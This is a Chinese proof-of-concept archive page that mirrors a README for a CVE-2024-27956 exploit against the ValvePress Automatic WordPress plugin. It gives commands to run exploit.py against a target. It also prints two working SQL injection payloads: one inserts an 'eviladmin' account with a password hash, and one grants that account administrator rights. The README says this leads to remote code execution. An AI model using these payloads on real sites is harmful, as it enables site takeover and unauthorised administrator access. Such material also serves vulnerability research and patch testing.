关联漏洞
描述
PoC for wordpress takeover in CVE-2024-27956
介绍
# CVE-2024-27956-RCE
A PoC for CVE-2024-27956, a SQL Injection in ValvePress Automatic plugin. This PoC exploit the vulnerability creating a user in the target and giving Administrator rights. Being an administrator in wordpress can lead to Remote Code Execution.
<h1>Usage</h1>
```
git clone https://github.com/diego-tella/CVE-2024-27956-RCE/
cd CVE-2024-27956-RCE
python exploit.py http://target.com
```
<h1>Payloads</h1>
SQL Injection payload to create a user:
```
q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_status, display_name) VALUES ('eviladmin', '$P$BASbMqW0nlZRux/2IhCw7AdvoNI4VT0', 'eviladmin', 'eviladmin@gmail.com', 'http://127.0.0.1:8000', '2024-04-30 16:26:43', 0, 'eviladmin')
```
Giving admin rights:
```
q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES ((SELECT ID FROM wp_users WHERE user_login = 'eviladmin'), 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}
```
In the q parameter, we can pass our entire query and then it will be executed.
The user input is executed directly without any kind of restriction or sanitization.
<h1>PoC</h1>
<a href="https://www.youtube.com/watch?v=2y5siI-K-G0"><img src="Screenshot_2.png"></a>
文件快照
[4.0K] /data/pocs/4d4970d46fafd0e3860032696eeff042afcec4c2
├── [2.2K] exploit.py
├── [1.3K] README.md
└── [185K] Screenshot_2.png
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。